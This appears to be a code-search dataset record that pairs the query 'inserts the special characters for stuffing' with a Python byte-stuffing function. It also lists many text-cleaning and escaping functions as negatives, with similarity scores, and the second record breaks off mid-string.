"def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r",
"def remove_non_alpha(self,text):\n \n removelist=\"-\\.\\/\\?\\@\"\n re_alpha_numeric1=r\"[^0-9a-zA-Z\"+removelist+\" ]\"\n clean_text=re.sub(re_alpha_numeric1,'',text)\n clean_text=clean_text.replace('/',' ')\n clean_text=re.sub(' +', ' ', clean_text)\n return clean_text",
"def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string",
"def strip_content(content):\n return ' ' + content.upper().\\\n replace('+','').\\\n replace('\"','').\\\n replace('@','').\\\n replace('-','').\\\n replace('?','').\\\n replace('*',''). \\\n replace('.', '') + ' '",
"def clean_content(self) -> str:",
"def sanitize(wl):\n s = []\n for word in wl:\n for symbol in ['.', '!', ',', '\\n', '\\r', '?']:\n if symbol in word:\n s.append(symbol)\n word = word.replace(symbol, '')\n \n s.append(word)\n return s",
"def remove_string_special_characters(s):\n stripped = re.sub('[^\\w\\s]', '', s)\n stripped = re.sub('_', '', stripped)\n stripped = re.sub('\\s+', ' ', stripped)\n stripped = stripped.strip()\n\n return stripped",
"def cleaner(self, w_old):\n w_new = re.sub('[\\(\\)]', '', w_old)\n w_new = re.sub('[^А-Яа-яЁё ]', 'ъ', w_new)\n w_new = re.sub(' ', ' ', w_new)\n return w_new",
"def replace_bad_characters(self, str):\n\n str = unicode(BeautifulStoneSoup(str,\n convertEntities=BeautifulStoneSoup.HTML_ENTITIES))\n str = unicodedata.normalize('NFKD', str).encode('ascii', 'ignore')\n str = unicode(re.sub('[^\\w\\s-]', '', str).strip().lower())\n str = unicode(str.replace(' ', '-'))\n return str",
"def cleanASJP(word):\n word = re.sub(r\",\", \"-\", word)\n word = re.sub(r\"\\%\", \"\", word)\n word = re.sub(r\"\\*\", \"\", word)\n word = re.sub(r\"\\\"\", \"\", word)\n word = re.sub(r\".~\", \"\", word)\n word = re.sub(r\"(.)(.)(.)\\$\", r\"\\2\", word)\n word = re.sub(r\"\\$\", \"\", word)\n word = re.sub(r\"\\s+\", \"\", word)\n return word.replace('~', '')",
"def cleanUpString(text):\r\n if text is None or text == '':\r\n return text\r\n try:\r\n text = text.encode(\"utf-8\")\r\n except:\r\n newText = \"\"\r\n t = text.decode(\"utf-8\")\r\n for c in t:\r\n newC = c\r\n if ord(c)>127:\r\n newC = \"&#%s;\" % ord(c)\r\n if ord(c)==8211:\r\n #change to this otherwise the toc has – value instead of endash\r\n newC = chr(45)\r\n if ord(c)==160:\r\n # \r\n newC = \" \"\r\n newText += newC\r\n text = newText\r\n text = str(text)\r\n return text",
"def fix_characters(title):\n return re.sub('[^0-9a-zA-Z]+', ' ', title)",
"def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r",
"def process_text(text):\n text = re.sub(r'<@>\\s+|<s>\\s+|</s>\\s+|<p>\\s+|</p>\\s+|\\s+\\,|\\'s|\\'|\\;|\\(|\\)|\\-\\-\\s+|\\s+\\.', '', text)\n text = re.sub(r'\\.\\,', '. ,', text)\n text = re.sub(r'\\,', '', text)\n text = re.sub(r'\\$', '$ ', text)\n text = re.sub(r'\\%', ' %', text)\n text = re.sub(r'\\s\\\"\\s', ' ', text)\n text = re.sub(r'\\.\\s+', '. ', text)\n text = text.lower()\n return text",
"def removeApostrophes(self, words):\n\t\treturn self.__apostropheRegex.sub('', words)",
"def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])",
"def cleantxt(text):\n return ((text.replace(',', '')).replace('/', ' ')).replace('-', ' ')",
"def preprocess(x):\n\n\tres = re.sub(r'[^\\w\\s]', '', x)\n\tres = res.strip('\\n')\n\n\treturn res",
"def clean_text(text):\n\n\n regex = re.compile('[\\.|\\-|\\,|\\?|\\_|\\:|\\\"|\\)|\\(\\)\\/|\\\\|\\>|\\<]')\n text = text.lower() # Turn everything to lower case\n text = regex.sub(' ', text).strip()\n out = re.sub(' +', ' ', text) # Reduce whitespace down to one\n \n return out",
"def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)",
"def normalize(self, what):\n txt = strippedtxt(what, [\"\\002\", \"\\003\"])\n txt = re.sub(\"\\s+\", \" \", what)\n txt = stripcolor(txt)\n txt = txt.replace(\"\\002\", \"*\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n return txt",
"def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))",
"def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text",
"def remove_escape_characters(text):\n text_removed_escape = list(map(lambda x: x.replace(\"\\\\\", \"\").replace(\"'\", \"\").strip().lower(), re.split(r\"(?<=\\\\)[a-z]{1}\", repr(text))))\n text_removed_extra_spaces = list(filter(lambda x: x != \"\", text_removed_escape))\n return \" \".join(text_removed_extra_spaces)",
"def clean_text(txt):\n\n for symbol in \"\"\".,'?!()/-:;\"\"\":\n txt = txt.replace(symbol, '')\n txt = txt.lower()\n txt = txt.split()\n return txt",
"def _cleanup_text(text):\n prefixChars = \"\"\n suffixChars = \"\"\n if text.startswith(\"-\"):\n prefixChars += \"-\"\n if text.startswith(\"_\"):\n prefixChars += \"_\"\n if text.endswith(\"-\"):\n suffixChars += \"-\"\n if text.endswith(\"_\"):\n suffixChars += \"_\"\n text = text.strip()\n text = text.replace('-', ' ')\n text = text.replace('_', ' ')\n text = text.replace(\"'\", ' ')\n text = re.sub('[ \\t\\r\\n]+', ' ', text) # Any whitespaces to one space.\n text = prefixChars + text + suffixChars\n return text",
"def text_prep(text):\n text1 = text.lower()\n text2 = re.sub('[.,!?\"\\'-\\\\\\/:;1-9+]', ' ', text1)\n text3 = text2.replace('\\n', ' ')\n text4 = re.sub(' +', ' ', text3)\n text_obrab = text4.split()\n return text_obrab",
"def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])",
"def stripword( s ) :\n return re.sub( '[\\W\\d]', '', s )",
"def sanitize_txt(x):\n return '_'.join(smart_split(x.lower()))",
"def text_cleaning(self, text): # pylint: disable=no-self-use\n text = text.encode(\"ascii\", \"ignore\").decode(\"ascii\", \"ignore\")\n text = re.sub(r'[^\\x00-\\x7F]', '', text)\n text = text.replace(\"\\n\", \"\")\n text = text.replace(\"\\'\", \"'\")\n text = text.replace(\"\\\\\\\"\", '\\\"')\n text = text.replace(\"&\", \"&\")\n text = text.replace(\""\", '\\\"')\n text = text.replace(\" \", ' ')\n text = text.strip().lstrip().rstrip()\n desc_text = ' '.join(text.split())\n return desc_text",
"def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")",
"def _hidden_in_unicode(self, txt):",
"def remove_special_tags(text):\n clean = re.compile('{.*?}')\n return re.sub(clean, '', text)",
"def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', text)\n\n return text",
"def processword(word):\n word = word.lower()\n word = word.strip('()?,!`.-:\\\"\\n \\'')\n return word",
"def clean(str):\n str = str.replace(u\"“\",u\"``\")\n str = str.replace(u\"”\",u\"''\")\n str = str.replace(u' \"',u\" ``\")\n str = str.replace(u'\"',u\"''\")\n str = str.replace(u'fi',u\"fi\")\n str = str.replace(u'fl',u\"fl\")\n str = str.replace(u'’',u\"'\")\n str = str.replace(u'–',u\"---\")\n str = str.replace(u'&',u\"\\\\&\")\n str = str.replace(u'#',u\"\\\\#\")\n str = str.replace(u'_',u\"\\\\_\")\n \n return str",
"def test_special_characters(self):\n testString = sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')",
"def handle_special_symbols(text: str\n ) -> str:\n valid_special_symbols = {' ', '_'}\n\n def criteria(c: str\n ) -> str:\n return c if c.isalnum() or c in valid_special_symbols else ' '\n\n return ''.join(criteria(c) for c in list(text))",
"def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext",
"def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext",
"def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext",
"def _cleanse(text):\n return ''.join([character for character in text\n if character.isalnum()]).lower()",
"def sanitize(instring):\r\n return instring.encode('ascii','replace')",
"def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line",
"def _strip_invalid_characters(self: object) -> None:\n for current_invalid_character in Episode._invalid_characters:\n self.episode_broadcast = self.episode_broadcast.replace(current_invalid_character, \" \").strip()\n self.episode_inspectors = self.episode_inspectors.replace(current_invalid_character, \" \").strip()\n self.episode_name = self.episode_name.replace(current_invalid_character, \" \").strip()\n self.episode_sequence = self.episode_sequence.replace(current_invalid_character, \"-\").strip()",
"def clean(tweet):\n #Separates the contractions and the punctuation\n\n\n tweet = re.sub(\"[!#.,\\\"]\", \"\", tweet).replace(\"<user>\", \"\")\n tweet = re.sub(\"[!#.,\\\"]\", \"\", tweet).replace(\"<url>\", \"\")\n tweet = correct_spell(tweet)\n return tweet.strip().lower()",
"def wipe_bad_chars(filename):\n return multi_replace(filename, {'(': '', ' ': '_', ')': '', '/': '_'})",
"def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt",
"def pre_process(text: str) -> str:\n text = text.replace('--', '-')\n space_right = '!?:;,.-()*+-/<=>@^_'\n space_both = '-()*+-/<=>@^_'\n\n for punct in space_right:\n text = text.replace(punct, punct + ' ')\n for punct in space_both:\n text = text.replace(punct, ' ' + punct + ' ')\n\n # remove extra space\n text = re.sub(r' +', ' ', text)\n return text",
"def _removeDiacritics(self, text):\n norm_txt = unicodedata.normalize('NFD', text)\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n # remove accents and other diacritics, replace spaces with \"_\" because identifiers can't have spaces\n no_spaces = unicodedata.normalize(\n 'NFC', shaved).lower().replace(\" \", \"_\")\n final_text = no_spaces\n # only allow [a-z], [0-9] and _\n p = re.compile('[a-z0-9_]+')\n for i in range(0, len(no_spaces)):\n if not (p.match(no_spaces[i])):\n final_text = final_text[:i] + '_' + final_text[i+1:]\n # i the first char is not a-z then replaceit (all identifiers must start with a letter)\n p2 = re.compile('[a-z]+')\n if not p2.match(final_text[0]):\n final_text = 'a' + final_text[1:]\n return final_text",
"def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])",
"def sanitize_text(text: str) -> str:\n for r in [RE_NOISE, RE_EMAIL, RE_REFERENCE]:\n text = r.sub(\"\", text)\n return text",
"def basic_cleaning2(string):\n\n string = string.lower()\n string = re.sub('[0-9\\(\\)\\!\\^\\%\\$\\'\\\"\\.;,-\\?\\{\\}\\[\\]\\\\/]', ' ', string)\n string = re.sub(' +', ' ', string)\n return string",
"def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text",
"def clean_venue(venue):\n\n return venue.lower().strip('?:!.,;- ')",
"def clean_text(text):\n text = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", text)\n text = re.sub(r\"\\'s\", \" \\'s\", text)\n text = re.sub(r\"\\'ve\", \" \\'ve\", text)\n text = re.sub(r\"n\\'t\", \" n\\'t\", text)\n text = re.sub(r\"\\'re\", \" \\'re\", text)\n text = re.sub(r\"\\'d\", \" \\'d\", text)\n text = re.sub(r\"\\'ll\", \" \\'ll\", text)\n text = re.sub(r\",\", \" , \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\(\", \" \\( \", text)\n text = re.sub(r\"\\)\", \" \\) \", text)\n text = re.sub(r\"\\?\", \" \\? \", text)\n text = re.sub(r\"\\s{2,}\", \" \", text)\n return text.strip().lower()",
"def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text",
"def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text",
"def clean_tweet(tweet):\n\n pattern = r'http\\S+|pic.\\S+|@[a-zA-Z0-9_]+|#[a-zA-Z0-9_]+|[‘’“”’–—…]|\\xa0'\n return re.sub(pattern, '', tweet)"
] | [
"0.812195",
"0.7796951",
"0.7721134",
"0.7502092",
"0.74759036",
"0.74687314",
"0.74635375",
"0.74607944",
"0.74368715",
"0.73807883",
"0.7368768",
"0.733261",
"0.73250467",
"0.7321472",
"0.7290007",
"0.7253354",
"0.72486293",
"0.7246413",
"0.72234553",
"0.72016734",
"0.70941263",
"0.7065173",
"0.7057635",
"0.7056931",
"0.70357066",
"0.7034848",
"0.7020548",
"0.70183563",
"0.69993615",
"0.6994655",
"0.6984761",
"0.6976117",
"0.6970078",
"0.6970069",
"0.6968109",
"0.6936857",
"0.69045323",
"0.68977875",
"0.6859235",
"0.6854273",
"0.6852882",
"0.68309134",
"0.6820921",
"0.6805765",
"0.6791286",
"0.67671776",
"0.67525107",
"0.6742554",
"0.67384493",
"0.67325366",
"0.6713737",
"0.670871",
"0.6706358",
"0.669645",
"0.6695137",
"0.6693032",
"0.6688467",
"0.66813964",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66670036",
"0.66633904",
"0.6652145",
"0.66432977",
"0.6626633",
"0.66052306",
"0.6602152",
"0.6598754",
"0.65890324",
"0.65762454",
"0.6566943",
"0.65574616",
"0.6556249",
"0.6548358",
"0.6546717",
"0.6531763",
"0.6522631",
"0.65204114",
"0.65204114",
"0.6509194",
"0.64936453",
"0.64935166",
"0.64908653",
"0.6488617",
"0.64844275",
"0.6474326",
"0.6471118",
"0.6470705",
"0.6466766",
"0.6465116",
"0.64607704",
"0.6452783",
"0.64515543",
"0.64477974",
"0.64476967",
"0.6445775",
"0.6445775",
"0.6440607"
] | 0.0 | -1 |
inserts the special characters for stuffing | def __packet_stuff(self, data):
stuffed = bytearray()
stuffed.append(0x7e)
for count in data:
if count >= 0x7d and count <= 0x7f:
stuffed.append(0x7d)
stuffed.append(count - 0x7d)
else:
stuffed.append(count)
stuffed.append(0x7f)
return(stuffed) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def replace_special(text):\r\n text = text.replace('\\r\\n', ' ')\r\n text = text.replace('\\n', ' ')\r\n text = text.replace('``', \"''\")\r\n text = text.replace('`', \"'\")\r\n text = text.replace('“', '\"')\r\n text = text.replace('”', '\"')\r\n text = text.replace('’', \"'\")\r\n text = text.replace('‘', \"'\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('–', \"-\")\r\n text = text.replace('\\\"', '\"')\r\n text = text.replace(\"\\'\", \"'\")\r\n return text",
"def replace_special_chars(self, word):\n try:\n if (self.lang==\"tr\"):\n word = re.sub(u\"\\^db\", u\"+db\", word)\n word = re.sub(u\"\\^\", u\"¬\", word)\n word = re.sub(u\"\\$\", u\"£\", word)\n except UnicodeDecodeError:\n word = ''\n return word",
"def _escapeSpecialCharacters(text):\n text.replace('\\\\', '\\\\\\\\')\n escape = ['~', '#', '&', '%', '_']\n for c in escape:\n text = text.replace(c, '\\\\' + c )\n return text",
"def _escape(self,text):\n\t\tif not text: return \"_\" # escape empty string\n\t\ttext = text.replace(\"_\",\"__\") # escape underscores\n\t\ttext = text.replace(\" \",\"_\") # escape spaces\n\t\ttext = text.replace(\"-\",\"--\") # escape dashes\n\t\ttext = text.replace(\"''\",'\"') # escape double quote\n\t\ttext = text.replace(\"?\",\"~q\") # escape question marks\n\t\ttext = text.replace(\"%\",\"~p\") # escape question marks\n\t\ttext = text.replace(\"#\",\"~h\") # escape question marks\n\t\ttext = text.replace(\"/\",\"~s\") # escape question marks\n\t\treturn text",
"def insert_special_char(phrase_words):\n SPECIAL = [\n [\"~\", \"!\", \"#\", \"$\", \"%\", \"^\"],\n [\"&\", \"*\", \"(\", \")\", \"-\", \"=\"],\n [\"+\", \"[\", \"]\", \"\\\\\", \"{\", \"}\"],\n [\":\", \";\", \"\\\"\", \"\\'\", \"<\", \">\"],\n [\"?\", \"/\", \"0\", \"1\", \"2\", \"3\"],\n [\"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]]\n n = len(phrase_words)\n\n rand_i = secrets.randbelow(n)\n rand_w = phrase_words[rand_i] # Random word\n rand_w_i = secrets.randbelow(len(rand_w)) # Random character\n\n rand_row = secrets.choice(SPECIAL)\n rand_special = secrets.choice(rand_row)\n\n # Replace char and word\n rand_w = rand_w[rand_w_i] + rand_special + rand_w[:rand_w_i+1]\n phrase_words[rand_i] = rand_w",
"def handle_special_symbols(text: str\n ) -> str:\n valid_special_symbols = {' ', '_'}\n\n def criteria(c: str\n ) -> str:\n return c if c.isalnum() or c in valid_special_symbols else ' '\n\n return ''.join(criteria(c) for c in list(text))",
"def escapeEncode(s: unicode) -> unicode:\n ...",
"def test_special_characters(self):\n testString = sanitize('[-;]\\`{\\}')\n self.assertEqual(testString, '_________')",
"def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text",
"def encode(self, text):",
"def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)",
"def escape(self, text, escape_chars):\n _bs = \"\\\\\"\n # backslash is always escaped\n text = text.replace(_bs, _bs * 2)\n for _el in escape_chars:\n assert _el != _bs, \"Backslash has been already escaped\"\n text = text.replace(_el, _bs + _el)\n return text",
"def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)",
"def html_escape(text):\r\n\treturn \"\".join(html_escape_table.get(c,c) for c in text)",
"def encode(self, text):\n # taken from htmlcss1 writer\n # @@@ A codec to do these and all other HTML entities would be nice.\n text = text.replace(\"&\", \"&\")\n text = text.replace(\"<\", \"<\")\n text = text.replace('\"', \""\")\n text = text.replace(\">\", \">\")\n text = text.replace(\"@\", \"@\") # may thwart some address harvesters\n return text",
"def escape(text):\n return text_type(text).replace('&', '&').replace('<', '<').replace('>', '>')",
"def resolve_special_chars(location):\n matches = re.findall(\"(u0[\\w+]{3}|')\", location)\n if matches != []:\n for special_char in matches:\n if special_char != \"'\":\n tmp_char = \"\\\\\" + special_char\n location = location.replace(\n special_char,\n tmp_char.encode().decode('unicode-escape'))\n else:\n location = location.replace(special_char, \"'\")\n return location",
"def html_escape(text):\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def html_escape(text):\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"def escape_meme_text(text):\n replacements = {\n \" \": \"_\",\n \"?\": \"~q\",\n \"%\": \"~p\",\n \"#\": \"~h\",\n \"/\": \"~s\",\n \"''\": \"\\\"\",\n }\n\n for r in replacements.keys():\n text = text.replace(r, replacements[r])\n\n return text",
"def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence",
"def escape(self,s):\n\t\ts = s.replace('&', '&').replace('<', '<').replace('>', '>')\n\t\ts = s.replace('\"','').replace(\"'\",\"\")\n\t\treturn ''.join([c for c in s if ord(c) > 0x1F])",
"def encodeSpecialChars(self, input):\n ret = libxml2mod.xmlEncodeSpecialChars(self._o, input)\n return ret",
"def escape(self):\n pass",
"def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text",
"def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text",
"def escape(text):\n return text.replace('&', '&'). \\\n replace('<', '<'). \\\n replace('>', '>').replace('\"', '"'). \\\n replace(\"'\", ''')",
"def encodeText(text):\r\n#\treturn repr( quote_plus(text.replace(\"'\", '\"')) )\r\n\ttry:\r\n\t\treturn repr( quote_plus(text.replace(\"'\", '\"').encode('utf-8')) )\r\n\texcept:\r\n\t\tlogError(\"encodeText()\")\r\n\treturn repr(text.replace(\"'\", '\"'))",
"def encode(self, text):\n if self.verbatim:\n return text\n # compile the regexps once. do it here so one can see them.\n #\n # first the braces.\n if not self.__dict__.has_key('encode_re_braces'):\n self.encode_re_braces = re.compile(r'([{}])')\n text = self.encode_re_braces.sub(r'{\\\\\\1}',text)\n if not self.__dict__.has_key('encode_re_bslash'):\n # find backslash: except in the form '{\\{}' or '{\\}}'.\n self.encode_re_bslash = re.compile(r'(?<!{)(\\\\)(?![{}]})')\n # then the backslash: except in the form from line above:\n # either '{\\{}' or '{\\}}'.\n text = self.encode_re_bslash.sub(r'{\\\\textbackslash}', text)\n\n # then dollar\n text = text.replace(\"$\", '{\\\\$}')\n # then all that needs math mode\n text = text.replace(\"<\", '{$<$}')\n text = text.replace(\">\", '{$>$}')\n # then\n text = text.replace(\"&\", '{\\\\&}')\n text = text.replace(\"_\", '{\\\\_}')\n # the ^:\n # * verb|^| does not work in mbox.\n # * mathmode has wedge. hat{~} would also work.\n text = text.replace(\"^\", '{\\\\ensuremath{^\\\\wedge}}')\n text = text.replace(\"%\", '{\\\\%}')\n text = text.replace(\"#\", '{\\\\#}')\n text = text.replace(\"~\", '{\\\\~{}}')\n if self.insert_newline:\n # HACK: insert a blank before the newline, to avoid \n # ! LaTeX Error: There's no line here to end.\n text = text.replace(\"\\n\", '~\\\\\\\\\\n')\n elif self.mbox_newline:\n text = text.replace(\"\\n\", '}\\\\\\\\\\n\\\\mbox{')\n if self.insert_none_breaking_blanks:\n text = text.replace(' ', '~')\n # unicode !!! \n text = text.replace(u'\\u2020', '{$\\\\dagger$}')\n return text",
"def encode(self, text):\n if self.verbatim:\n return text\n # compile the regexps once. do it here so one can see them.\n #\n # first the braces.\n if not self.__dict__.has_key('encode_re_braces'):\n self.encode_re_braces = re.compile(r'([{}])')\n text = self.encode_re_braces.sub(r'{\\\\\\1}',text)\n if not self.__dict__.has_key('encode_re_bslash'):\n # find backslash: except in the form '{\\{}' or '{\\}}'.\n self.encode_re_bslash = re.compile(r'(?<!{)(\\\\)(?![{}]})')\n # then the backslash: except in the form from line above:\n # either '{\\{}' or '{\\}}'.\n text = self.encode_re_bslash.sub(r'{\\\\textbackslash}', text)\n\n # then dollar\n text = text.replace(\"$\", '{\\\\$}')\n if not ( self.literal_block or self.literal or self.mathmode ):\n # the vertical bar: in mathmode |,\\vert or \\mid\n # in textmode \\textbar\n text = text.replace(\"|\", '{\\\\textbar}')\n text = text.replace(\"<\", '{\\\\textless}')\n text = text.replace(\">\", '{\\\\textgreater}')\n # then\n text = text.replace(\"&\", '{\\\\&}')\n # the ^:\n # * verb|^| does not work in mbox.\n # * mathmode has wedge. hat{~} would also work.\n # text = text.replace(\"^\", '{\\\\ensuremath{^\\\\wedge}}')\n text = text.replace(\"^\", '{\\\\textasciicircum}')\n text = text.replace(\"%\", '{\\\\%}')\n text = text.replace(\"#\", '{\\\\#}')\n text = text.replace(\"~\", '{\\\\textasciitilde}')\n # Separate compound characters, e.g. \"--\" to \"-{}-\". (The\n # actual separation is done later; see below.)\n separate_chars = '-'\n if self.literal_block or self.literal:\n # In monospace-font, we also separate \",,\", \"``\" and \"''\"\n # and some other characters which can't occur in\n # non-literal text.\n separate_chars += ',`\\'\"<>'\n # pdflatex does not produce doublequotes for ngerman.\n text = self.babel.double_quotes_in_tt(text)\n if self.font_encoding == 'OT1':\n # We're using OT1 font-encoding and have to replace\n # underscore by underlined blank, because this has\n # correct width.\n text = text.replace('_', '{\\\\underline{ }}')\n # And the tt-backslash doesn't work in OT1, so we use\n # a mirrored slash.\n text = text.replace('\\\\textbackslash', '\\\\reflectbox{/}')\n else:\n text = text.replace('_', '{\\\\_}')\n else:\n text = 